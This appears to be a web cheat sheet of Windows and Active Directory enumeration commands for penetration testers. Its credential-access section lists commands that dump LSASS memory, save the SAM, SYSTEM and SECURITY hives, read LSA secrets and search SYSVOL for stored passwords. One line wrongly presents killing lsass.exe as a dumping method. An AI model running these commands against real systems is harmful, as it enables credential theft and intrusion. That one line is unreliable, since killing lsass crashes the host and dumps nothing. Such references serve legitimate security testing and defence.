Complete Windows Enumeration Manual
Comprehensive reference guide with all Windows enumeration techniques for security professionals. Contains 500+ commands covering local system, Active Directory, privilege escalation, and more.
System Info
Network
Processes
Registry
Active Directory
Privilege Escalation
Credentials
Tools
Local System Enumeration
Complete local system enumeration covering all Windows components, services, configurations, and artifacts.
Complete System Information
# Complete OS and hardware enumeration
## Basic system info
systeminfo
systeminfo /fo csv
hostname
ver
wmic os get Caption,Version,OSArchitecture,BuildNumber,CSDVersion,SerialNumber,InstallDate,LastBootUpTime,Locale,CountryCode,OSLanguage /value
wmic computersystem get Name,Domain,Manufacturer,Model,TotalPhysicalMemory,SystemType,UserName,Roles /value
## Detailed hardware info
wmic cpu get Name,Description,DeviceID,NumberOfCores,NumberOfLogicalProcessors,MaxClockSpeed,CurrentClockSpeed,SocketDesignation,Manufacturer /value
wmic memorychip get BankLabel,Capacity,DataWidth,Description,DeviceLocator,Manufacturer,PartNumber,SerialNumber,Speed /value
wmic diskdrive get Model,InterfaceType,MediaType,Name,Partitions,Size,SerialNumber /value
wmic logicaldisk get DeviceID,DriveType,Size,FreeSpace,FileSystem,VolumeName,VolumeSerialNumber /value
wmic volume get Label,Capacity,FreeSpace,FileSystem,DriveLetter /value
## BIOS and firmware
wmic bios get Manufacturer,Name,SerialNumber,SMBIOSBIOSVersion,Version,ReleaseDate /value
wmic baseboard get Manufacturer,Product,SerialNumber,Version /value
wmic computersystem get OEMStringArray
## Time and locale
systeminfo | findstr /C:"Time Zone"
wmic timezone get Caption,StandardName
reg query "HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation"
systeminfo | findstr /C:"System Locale" /C:"Input Locale"
Complete User & Group Enumeration
# Complete user and group enumeration
## Current user context
whoami
whoami /priv
whoami /groups
whoami /all
echo %USERNAME%
echo %USERDOMAIN%
echo %LOGONSERVER%
qwinsta
query session
query user
klist sessions
## Local user accounts
net user
net user /domain
net user <username>
net user <username> /domain
wmic useraccount get Name,FullName,Disabled,Status,Lockout,SID /value
wmic useraccount where "LocalAccount=True" get Name,Disabled,Status,Lockout,SID
## Local groups
net localgroup
net localgroup Administrators
net localgroup "Remote Desktop Users"
net localgroup "Backup Operators"
net localgroup "Power Users"
wmic group get Name,SID
## Account policies
net accounts
net accounts /domain
net config workstation
net config server
## Logged on users
qwinsta
query session
query user
net session
klist sessions
klist tgt
Complete Network Enumeration
# Complete network enumeration
## Network interfaces
ipconfig /all
ipconfig /displaydns
ipconfig /displaydns | findstr /C:"Record Name"
netsh interface ip show config
netsh interface ipv4 show addresses
netsh interface ipv4 show subinterfaces
netsh interface ipv4 show interfaces
netsh interface ipv6 show addresses
netsh interface ipv6 show interfaces
wmic nicconfig get IPAddress,MACAddress,DefaultIPGateway,DHCPEnabled,DNSServerSearchOrder
## Routing tables
route print
route print -4
route print -6
netsh interface ipv4 show route
netsh interface ipv6 show route
arp -a
arp -a -v
## DNS information
nslookup
nslookup -type=soa <domain>
nslookup -type=mx <domain>
nslookup -type=ns <domain>
nslookup -type=txt <domain>
type %WINDIR%\System32\drivers\etc\hosts
type %WINDIR%\System32\drivers\etc\networks
type %WINDIR%\System32\drivers\etc\protocol
type %WINDIR%\System32\drivers\etc\services
## Active connections
netstat -ano
netstat -ano -p tcp
netstat -ano -p udp
netstat -ano -f
netstat -abno
netstat -bano
netstat -r
netstat -e
netstat -s
## Firewall configuration
netsh firewall show config
netsh advfirewall firewall show rule name=all
netsh advfirewall show allprofiles
netsh advfirewall show currentprofile
netsh advfirewall show global
Complete Process & Service Enumeration
# Complete process and service enumeration
## Process enumeration
tasklist
tasklist /SVC
tasklist /V
tasklist /M
tasklist /FO csv
wmic process get Name,ProcessId,ParentProcessId,CommandLine,ExecutablePath,WorkingSetSize,ThreadCount,HandleCount /value
wmic process where "Name='lsass.exe'" get CommandLine,ProcessId,ParentProcessId
wmic process where "Name='explorer.exe'" get CommandLine,ProcessId,ParentProcessId
Get-Process | Select-Object Name,Id,CPU,WorkingSet,Path,StartTime,Company,ProductVersion
Get-Process | Where-Object {$_.Path -like "*temp*"} | Select-Object Name,Id,Path
## Service enumeration
sc query
sc queryex
sc qc "<service_name>"
sc qfailure "<service_name>"
sc enumdepend "<service_name>"
net start
wmic service get Name,DisplayName,PathName,StartMode,State,StartName,ProcessId /value
wmic service where "StartMode='Auto'" get Name,DisplayName,PathName
wmic service where "State='Running'" get Name,DisplayName,PathName
Get-Service | Select-Object Name,DisplayName,Status,StartType
Get-WmiObject Win32_Service | Select-Object Name,State,PathName,StartMode
## Driver enumeration
driverquery
driverquery /v
driverquery /fo csv
driverquery /si
fltmc
fltmc instances
wmic sysdriver get Name,DisplayName,PathName,State,StartMode /value
Complete Registry Enumeration
# Complete registry enumeration
## Startup locations
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices"
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
reg query "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon"
## Environment variables in registry
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment"
reg query "HKCU\Environment"
## AppInit DLLs and KnownDLLs
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs"
## LSA and security configuration
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Kerberos"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Lsa\SSP"
## Service configurations
reg query "HKLM\SYSTEM\CurrentControlSet\Services"
reg query "HKLM\SYSTEM\CurrentControlSet\Services\<service_name>"
## SAM and security hives
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
## PowerShell settings
reg query "HKLM\Software\Policies\Microsoft\Windows\PowerShell"
reg query "HKCU\Software\Policies\Microsoft\Windows\PowerShell"
## UAC settings
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System"
Complete File System Enumeration
# Complete file system enumeration
## Sensitive file locations
dir /a C:\Windows\System32\config\SAM
dir /a C:\Windows\repair\SAM
dir /a C:\Windows\System32\drivers\etc\
type C:\Windows\System32\drivers\etc\hosts
type C:\Windows\System32\drivers\etc\networks
type C:\Windows\System32\drivers\etc\protocol
type C:\Windows\System32\drivers\etc\services
## Program directories
dir /a "C:\Program Files"
dir /a "C:\Program Files (x86)"
dir /a "C:\ProgramData"
dir /a "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
## User directories
dir /a "C:\Users"
dir /a "C:\Users\Public"
dir /a "C:\Users\<username>\Desktop"
dir /a "C:\Users\<username>\Documents"
dir /a "C:\Users\<username>\Downloads"
dir /a "C:\Users\<username>\AppData"
dir /a "C:\Users\<username>\AppData\Roaming"
dir /a "C:\Users\<username>\AppData\Local"
dir /a "C:\Users\<username>\AppData\LocalLow"
## Configuration files
dir /s /b *.config 2>nul
dir /s /b web.config 2>nul
dir /s /b *.xml 2>nul
dir /s /b *.ini 2>nul
dir /s /b *.conf 2>nul
dir /s /b *.txt 2>nul | findstr /i "pass"
dir /s /b *.log 2>nul
## Recent files and artifacts
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent"
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations"
dir /a "C:\Windows\Prefetch"
dir /a "$RECYCLE.BIN" /s 2>nul
## Log files
dir /a "C:\Windows\System32\winevt\Logs"
dir /a "C:\Windows\Logs"
dir /a "C:\inetpub\logs" 2>nul
Complete Scheduled Tasks Enumeration
# Complete scheduled tasks enumeration
schtasks /query /fo LIST /v
schtasks /query /fo TABLE
schtasks /query /fo CSV
schtasks /query /tn "<task_name>" /fo LIST /v
schtasks /query /tn "\Microsoft\Windows\*" /fo LIST
schtasks /query /tn "*\*" /fo LIST
# AT jobs (legacy)
at
# PowerShell scheduled tasks
Get-ScheduledTask | Select-Object TaskName,TaskPath,State
Get-ScheduledTask | Where-Object {$_.State -eq "Ready"} | Select-Object TaskName,TaskPath
Get-ScheduledTask | Where-Object {$_.TaskName -like "*update*"} | Select-Object TaskName,TaskPath,State
# WMI scheduled tasks
wmic job get Caption,Command,Status,StartTime
# XML scheduled tasks
dir /s C:\Windows\System32\Tasks
dir /s C:\Windows\Tasks
Complete Installed Applications Enumeration
# Complete installed applications enumeration
## WMI product enumeration
wmic product get Name,Version,Vendor,InstallDate
wmic product where "Vendor='Microsoft Corporation'" get Name,Version
wmic product where "Name like '%Adobe%'" get Name,Version
wmic product where "Name like '%Java%'" get Name,Version
wmic product where "Name like '%Office%'" get Name,Version
## Registry installed programs
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall"
reg query "HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall"
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall"
## File system programs
dir "C:\Program Files" /b
dir "C:\Program Files (x86)" /b
## Windows features
dism /online /Get-Features
dism /online /Get-Features | findstr /i "Enabled"
Get-WindowsOptionalFeature -Online | Where-Object {$_.State -eq "Enabled"} | Select-Object FeatureName
## PowerShell installed modules
Get-Module -ListAvailable
Get-InstalledModule
Get-Package
Complete Environment Variables Enumeration
# Complete environment variables enumeration
set
echo %PATH%
echo %PATHEXT%
echo %PROMPT%
echo %TEMP%
echo %TMP%
echo %WINDIR%
echo %SYSTEMROOT%
echo %PROGRAMFILES%
echo %PROGRAMFILES(x86)%
echo %APPDATA%
echo %LOCALAPPDATA%
echo %USERPROFILE%
echo %HOMEDRIVE%
echo %HOMEPATH%
echo %COMPUTERNAME%
echo %USERNAME%
echo %USERDOMAIN%
echo %LOGONSERVER%
echo %PROCESSOR_ARCHITECTURE%
echo %PROCESSOR_IDENTIFIER%
echo %NUMBER_OF_PROCESSORS%
echo %PROCESSOR_LEVEL%
echo %PROCESSOR_REVISION%
Complete Hotfix & Patch Enumeration
# Complete hotfix and patch enumeration
wmic qfe get Caption,Description,HotFixID,InstalledOn
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:csv
systeminfo | findstr /B /C:"Hotfix(s)"
systeminfo | findstr /C:"KB"
Get-HotFix
Get-HotFix | Sort-Object InstalledOn -Descending
Get-HotFix -Id KB*
# PowerShell update history
Get-WmiObject -Class Win32_QuickFixEngineering | Select-Object HotFixID,Description,InstalledOn
Get-WmiObject -Class Win32_QuickFixEngineering | Where-Object {$_.HotFixID -like "KB*"} | Select-Object HotFixID,Description,InstalledOn
# WSUS settings
reg query "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate"
reg query "HKLM\Software\Microsoft\Windows\CurrentVersion\WindowsUpdate"
Complete Browser Artifacts Enumeration
# Complete browser artifacts enumeration
## Chrome
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\"
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\Login Data"
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\Cookies"
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\History"
dir /a "%LocalAppData%\Google\Chrome\User Data\Default\Bookmarks"
dir /a "%LocalAppData%\Google\Chrome\User Data\Local State"
## Firefox
dir /a "%AppData%\Mozilla\Firefox\Profiles\"
dir /s "%AppData%\Mozilla\Firefox\Profiles\*.sqlite"
dir /s "%AppData%\Mozilla\Firefox\Profiles\*.json"
dir /s "%AppData%\Mozilla\Firefox\Profiles\*.db"
## Edge/IE
dir /a "%LocalAppData%\Microsoft\Edge\User Data\Default\"
dir /a "%AppData%\Microsoft\Windows\Cookies"
dir /a "%AppData%\Microsoft\Internet Explorer\UserData"
dir /a "%LocalAppData%\Microsoft\Internet Explorer\Recovery"
## Saved credentials
cmdkey /list
rundll32.exe keymgr.dll,KRShowKeyMgr
Complete PowerShell Enumeration
# Complete PowerShell enumeration
## PowerShell history
type (Get-PSReadlineOption).HistorySavePath
Get-Content (Get-PSReadlineOption).HistorySavePath
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\"
dir /a "C:\Users\<username>\Documents\WindowsPowerShell\"
## PowerShell transcripts
dir /a "C:\Users\<username>\Documents" *.txt | findstr /i "powershell_transcript"
dir /a "C:\Windows\System32\winevt\Logs" | findstr /i "powershell"
## PowerShell configuration
Get-ExecutionPolicy
Get-ExecutionPolicy -List
$ExecutionContext.SessionState.LanguageMode
Get-PSSessionConfiguration
Get-PSReadlineOption
## PowerShell modules
Get-Module
Get-Module -ListAvailable
Get-InstalledModule
Test-ModuleManifest <module>
## PowerShell profiles
$PROFILE
$PROFILE.AllUsersAllHosts
$PROFILE.AllUsersCurrentHost
$PROFILE.CurrentUserAllHosts
$PROFILE.CurrentUserCurrentHost
Test-Path $PROFILE
Get-Content $PROFILE -ErrorAction SilentlyContinue
Complete WMI Enumeration
# Complete WMI enumeration
## WMI namespaces
wmic /namespace:\\root path __namespace get name
Get-WmiObject -Namespace root -Class __Namespace | Select-Object Name
Get-CimInstance -Namespace root -ClassName __Namespace | Select-Object Name
## WMI event subscriptions
Get-WmiObject -Namespace root\Subscription -Class __EventFilter
Get-WmiObject -Namespace root\Subscription -Class __FilterToConsumerBinding
Get-WmiObject -Namespace root\Subscription -Class __EventConsumer
## WMI permanent event consumers
Get-WmiObject -Namespace root\Subscription -Class __AbsoluteTimerInstruction
Get-WmiObject -Namespace root\Subscription -Class __IntervalTimerInstruction
## WMI classes
wmic class list brief
wmic /namespace:\\root\cimv2 path Win32_Process get /value
wmic /namespace:\\root\cimv2 path Win32_Service get /value
wmic /namespace:\\root\cimv2 path Win32_ComputerSystem get /value
## WMI providers
wmic /namespace:\\root\cimv2 path __Win32Provider get /value
Complete COM/DCOM Enumeration
# Complete COM/DCOM enumeration
Get-CimInstance Win32_COMSetting
Get-ChildItem HKLM:\Software\Classes -ErrorAction SilentlyContinue | Where-Object {$_.PSChildName -match '^\w+\.\w+$'}
Get-ChildItem HKCR:\ -ErrorAction SilentlyContinue | Where-Object {$_.PSChildName -match '^\w+\.\w+$'}
# COM class enumeration
reg query "HKCR\CLSID"
reg query "HKLM\Software\Classes\CLSID"
# DCOM applications
reg query "HKCR\AppID"
reg query "HKLM\Software\Classes\AppID"
# CLSID extraction
reg query "HKCR" /f "CLSID" /k
Complete Certificate Store Enumeration
# Complete certificate store enumeration
certutil -store -user My
certutil -store -user -v My
certutil -store My
certutil -store -v My
certutil -store CA
certutil -store Root
certutil -store -enterprise
certutil -store -groupPolicy
# PowerShell certificate enumeration
Get-ChildItem Cert:\LocalMachine\My
Get-ChildItem Cert:\CurrentUser\My
Get-ChildItem Cert:\LocalMachine\Root
Get-ChildItem Cert:\LocalMachine\CA
Get-ChildItem Cert:\LocalMachine -Recurse
Get-ChildItem Cert:\CurrentUser -Recurse
# Certificate details
certutil -dump -v
certutil -viewstore "My"
certutil -viewdelstore "My"
# Certificate private keys
dir /a C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys
dir /a C:\Users\<username>\AppData\Roaming\Microsoft\Crypto\RSA
Complete Windows Event Logs Enumeration
# Complete Windows event logs enumeration
wevtutil el
wevtutil gli <log_name>
wevtutil qe <log_name> /f:text
wevtutil qe Security /f:text /rd:true /c:10
wevtutil qe System /f:text /rd:true /c:10
wevtutil qe Application /f:text /rd:true /c:10
# PowerShell event logs
Get-EventLog -List
Get-WinEvent -ListLog *
Get-WinEvent -LogName Security -MaxEvents 10
Get-WinEvent -LogName System -MaxEvents 10
Get-WinEvent -LogName Application -MaxEvents 10
# Specific interesting logs
Get-WinEvent -ListLog *PowerShell*
Get-WinEvent -ListLog *TerminalServices*
Get-WinEvent -ListLog *Windows Defender*
Get-WinEvent -ListLog *Microsoft-Windows-Sysmon*
# RDP logs
Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational" -MaxEvents 10
Get-WinEvent -LogName "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational" -MaxEvents 10
# PowerShell operational logs
Get-WinEvent -LogName "Microsoft-Windows-PowerShell/Operational" -MaxEvents 10
Get-WinEvent -LogName "Windows PowerShell" -MaxEvents 10
Complete RDP/Terminal Services Enumeration
# Complete RDP/Terminal Services enumeration
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
qwinsta
query session
query user
query termserver
netstat -ano | findstr :3389
# RDP certificates
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v SSLCertificateSHA1Hash
certutil -store -v My | findstr /i "rdp"
# Remote Desktop Gateway
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Terminal Server Gateway"
Domain & Active Directory Enumeration
Comprehensive Active Directory enumeration covering domain controllers, users, groups, computers, trust relationships, group policies, and SYSVOL.
Complete Domain Discovery & Information
# Complete domain discovery
net config workstation
net config server
net view /domain
net view /domain:<domain_name>
nltest /domain_trusts
nltest /dclist:<domain_name>
nltest /dsgetdc:<domain_name>
nltest /dsgetsite
nltest /dsgetsitecov
# Domain controller information
net group "Domain Controllers" /domain
netdom query dc
netdom query dc /domain:<domain_name>
nslookup -type=srv _ldap._tcp.dc._msdcs.<domain_name>
nslookup -type=srv _ldap._tcp.<domain_name>
nslookup -type=srv _kerberos._tcp.dc._msdcs.<domain_name>
# Forest information
netdom query fsmo
netdom query fsmo /domain:<domain_name>
dsquery server -hasfsmo schema
dsquery server -hasfsmo name
dsquery server -hasfsmo infr
dsquery server -hasfsmo pdc
dsquery server -hasfsmo rid
Complete Domain Users & Groups
# Complete domain user enumeration
net user /domain
net user <username> /domain
net group /domain
net group "Domain Admins" /domain
net group "Enterprise Admins" /domain
net group "Schema Admins" /domain
net group "Domain Users" /domain
net group "Domain Computers" /domain
net group "Domain Controllers" /domain
net group "Backup Operators" /domain
net group "Account Operators" /domain
net group "Server Operators" /domain
net group "Print Operators" /domain
net group "Replicator" /domain
# Detailed user information
net accounts /domain
net config workstation
dsquery user
dsquery user -name <username>
dsquery user -samid <sam_account_name>
dsget user <user_dn> -samid -sid -desc -email -tel
# Password policy
net accounts /domain
net accounts /domain | findstr /i "lockout"
net accounts /domain | findstr /i "length"
Complete Domain Computers Enumeration
# Complete domain computers enumeration
net group "Domain Computers" /domain
net view /domain:<domain_name>
net view \\<computer_name>
dsquery computer
dsquery computer -name <computer_name>
dsquery computer -samid <computer_account>
dsquery computer -desc <description>
# Computer details
dsget computer <computer_dn> -samid -sid -desc -loc
nltest /server:<computer_name> /query
nltest /server:<computer_name> /sc_query:<domain_name>
# SPN enumeration
setspn -T <domain_name> -Q */*
setspn -T <domain_name> -L <computer_name>
setspn -T <domain_name> -X
Complete Domain Shares Enumeration
# Complete domain shares enumeration
net share
net view
net view \\<computer_name>
net view /domain:<domain_name>
wmic /node:<computer_name> share get Name,Path,Type
wmic /node:<computer_name> share where "Type=0" get Name,Path
# Hidden shares
net share admin$
net share c$
net share ipc$
net share print$
# SMB configuration
reg query "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v NullSessionShares
reg query "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v NullSessionPipes
reg query "HKLM\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v RestrictNullSessAccess
Complete Trust Relationships Enumeration
# Complete trust relationships enumeration
nltest /domain_trusts
nltest /domain_trusts /all_trusts
nltest /trusted_domains
netdom trust /domain:<domain_name> /query
netdom trust /domain:<domain_name> /query /verbose
# Forest trusts
nltest /forest_trusts
netdom trust /domain:<domain_name> /query /forest
# Trust direction and type
dsquery * "CN=System,DC=<domain>,DC=<tld>" -filter "(&(objectClass=trustedDomain))" -attr *
Get-ADTrust -Filter *
Get-ADTrust -Identity <domain_name> -Properties *
Complete Group Policy Enumeration
# Complete Group Policy enumeration
gpresult /z
gpresult /h report.html
gpresult /r
gpresult /scope computer /z
gpresult /scope user /z
# Group Policy Objects
gplink
gpupdate /force
Get-GPO -All
Get-GPOReport -All -ReportType HTML -Path report.html
# Group Policy Preferences
dir \\<domain>\SYSVOL\<domain>\Policies\
findstr /S /I cpassword \\<domain>\SYSVOL\<domain>\Policies\*.xml
findstr /S /I cpassword \\<domain>\SYSVOL\<domain>\Policies\*.xml | findstr /B /I /V "<?"
# Specific GPP files
dir \\<domain>\SYSVOL\<domain>\Policies\*\Machine\Preferences\Groups\Groups.xml
dir \\<domain>\SYSVOL\<domain>\Policies\*\User\Preferences\Groups\Groups.xml
dir \\<domain>\SYSVOL\<domain>\Policies\*\Machine\Preferences\Services\Services.xml
dir \\<domain>\SYSVOL\<domain>\Policies\*\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
Complete SYSVOL Enumeration
# Complete SYSVOL enumeration
dir \\<domain>\SYSVOL\
dir \\<domain>\SYSVOL\<domain>\
dir \\<domain>\SYSVOL\<domain>\Policies\
dir \\<domain>\SYSVOL\<domain>\Scripts\
# Login scripts
dir \\<domain>\SYSVOL\<domain>\Scripts\Logon\
dir \\<domain>\SYSVOL\<domain>\Scripts\Logoff\
dir \\<domain>\SYSVOL\<domain>\Scripts\Startup\
dir \\<domain>\SYSVOL\<domain>\Scripts\Shutdown\
# Policy scripts
dir \\<domain>\SYSVOL\<domain>\Policies\*\Machine\Scripts\
dir \\<domain>\SYSVOL\<domain>\Policies\*\User\Scripts\
# Interesting files
findstr /S /I "pass" \\<domain>\SYSVOL\<domain>\*.txt
findstr /S /I "pass" \\<domain>\SYSVOL\<domain>\*.vbs
findstr /S /I "pass" \\<domain>\SYSVOL\<domain>\*.bat
findstr /S /I "pass" \\<domain>\SYSVOL\<domain>\*.ps1
Privilege Escalation Enumeration
Comprehensive privilege escalation vulnerability checks including service permissions, unquoted paths, DLL hijacking, token manipulation, and kernel exploits.
Complete Service Permission Checks
# Complete service permission checks
## Service binary permissions
accesschk.exe -accepteula -uwcqv "Authenticated Users" *
accesschk.exe -accepteula -uwcqv Users *
accesschk.exe -accepteula -uwcqv "Everyone" *
accesschk.exe -accepteula -uwcqv "NT AUTHORITY\INTERACTIVE" *
## Service configuration
sc qc <service_name>
sc queryex <service_name>
sc qfailure <service_name>
wmic service get Name,DisplayName,PathName,StartMode,StartName
wmic service where "StartName='LocalSystem'" get Name,DisplayName,PathName
## Service DACLs
sc sdshow <service_name>
sc sdshow SCMANAGER
## Service state
sc query state= all
sc query state= inactive
sc query state= all | findstr SERVICE_NAME
Complete Unquoted Service Path Checks
# Complete unquoted service path checks
wmic service get Name,DisplayName,PathName,StartMode | findstr /i /v "C:\Windows\\" | findstr /i /v """
wmic service where "not PathName like '%%.exe%%' and PathName like '% %'" get Name,DisplayName,PathName,StartMode
wmic service where "PathName like '%% %%' and not PathName like '\"%%\"'" get Name,DisplayName,PathName,StartMode
# PowerShell unquoted paths
Get-WmiObject win32_service | Select-Object Name,DisplayName,PathName,StartMode | Where-Object {$_.PathName -notlike '"*" -and $_.PathName -like "* *"}
Get-CimInstance win32_service | Select-Object Name,DisplayName,PathName,StartMode | Where-Object {$_.PathName -notlike '"*" -and $_.PathName -like "* *"}
# Manual checking
sc query | findstr SERVICE_NAME
for /f "tokens=2 delims=:" %i in ('sc query state= all ^| findstr SERVICE_NAME') do @for /f "delims= " %j in ("%i") do @sc qc "%j" | findstr BINARY_PATH_NAME
Complete AlwaysInstallElevated Checks
# Complete AlwaysInstallElevated checks
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
# PowerShell checks
Get-ItemProperty -Path "HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
Get-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer" -Name "AlwaysInstallElevated" -ErrorAction SilentlyContinue
# Windows Installer service
sc query msiserver
sc qc msiserver
Complete Weak Folder Permission Checks
# Complete weak folder permission checks
icacls "C:\Program Files\*" 2>nul | findstr "(F) (M) (W) :\" | findstr /v ":"
icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F) (M) (W) :\" | findstr /v ":"
icacls "C:\Windows\System32\*" 2>nul | findstr "(F) (M) (W) :\" | findstr /v ":"
# Service binary directories
for /f "tokens=2 delims=:" %i in ('sc query state= all ^| findstr SERVICE_NAME') do @for /f "delims= " %j in ("%i") do @sc qc "%j" | findstr BINARY_PATH_NAME | findstr /i /v "c:\windows"
# Startup directories
icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
icacls "C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
# PowerShell permissions
icacls "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
icacls "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Complete DLL Hijacking Checks
# Complete DLL hijacking checks
## PATH environment variable
echo %PATH%
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PATH
reg query "HKCU\Environment" /v PATH
## KnownDLLs
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs"
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\KnownDLLs" /v *
## AppInit DLLs
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs
reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v RequireSignedAppInit_DLLs
## DLL search order
set PATH
wmic environment where "Name='Path'" get *
Complete Token Manipulation Checks
# Complete token manipulation checks
whoami /priv
whoami /groups
whoami /all
# SeImpersonatePrivilege
whoami /priv | findstr /i "SeImpersonatePrivilege"
whoami /priv | findstr /i "SeAssignPrimaryTokenPrivilege"
whoami /priv | findstr /i "SeCreateTokenPrivilege"
whoami /priv | findstr /i "SeDebugPrivilege"
whoami /priv | findstr /i "SeTcbPrivilege"
# Token groups
whoami /groups | findstr /i "Mandatory Label"
whoami /groups | findstr /i "High Mandatory Level"
whoami /groups | findstr /i "Medium Mandatory Level"
whoami /groups | findstr /i "Low Mandatory Level"
# PowerShell token checks
[Security.Principal.WindowsPrincipal]::new([Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)
[Security.Principal.WindowsIdentity]::GetCurrent().Groups | Where-Object {$_.Value -match "S-1-16-"} | ForEach-Object {$_.Translate([Security.Principal.NTAccount])}
Credential Access Enumeration
Comprehensive credential extraction techniques including LSASS memory dumping, registry credential extraction, DPAPI, browser credentials, and saved passwords.
Complete LSASS Memory Dumping
# Complete LSASS memory dumping
## Procdump method
procdump.exe -accepteula -ma lsass.exe lsass.dmp
procdump.exe -accepteula -ma %windir%\system32\lsass.exe lsass.dmp
## Native Windows dumping
rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump <PID> <output_file> full
tasklist | findstr lsass.exe
for /f "tokens=2" %i in ('tasklist ^| findstr lsass.exe') do @rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump %i lsass.dmp full
## Taskkill method (destructive)
taskkill /F /IM lsass.exe
## WMI method
wmic process where "name='lsass.exe'" get ProcessId
Get-WmiObject Win32_Process -Filter "name = 'lsass.exe'" | Select-Object ProcessId
Complete Registry Credential Extraction
# Complete registry credential extraction
reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SECURITY security.save
# LSA secrets
reg query "HKLM\SECURITY\Policy\Secrets"
reg query "HKLM\SECURITY\Policy\Secrets\DefaultPassword"
reg query "HKLM\SECURITY\Policy\Secrets\$MACHINE.ACC"
reg query "HKLM\SECURITY\Policy\Secrets\NL$KM"
# DPAPI keys
reg save "HKLM\SECURITY\Policy\Secrets\DPAPI_SYSTEM" dpapi_system.save
reg save "HKCU\Software\Microsoft\Protected Storage System Provider" pssp.save
# Credential manager
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyServer
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyUser
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings" /v ProxyPass
Complete DPAPI & Credential Manager
# Complete DPAPI and credential manager enumeration
vaultcmd /list
vaultcmd /listcreds:"Windows Credentials"
vaultcmd /listproperties
vaultcmd /listschema
# Credential manager GUI
rundll32.exe keymgr.dll,KRShowKeyMgr
cmdkey /list
# DPAPI directory
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Protect"
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Credentials"
dir /a "C:\Users\<username>\AppData\Local\Microsoft\Credentials"
# Master key files
dir /a "C:\Users\<username>\AppData\Roaming\Microsoft\Protect\<SID>\*"
dir /a "C:\ProgramData\Microsoft\Crypto\RSA\MachineKeys"
Complete Saved Credentials Enumeration
# Complete saved credentials enumeration
## RDP saved credentials
reg query "HKCU\Software\Microsoft\Terminal Server Client\Servers"
reg query "HKCU\Software\Microsoft\Terminal Server Client\Default"
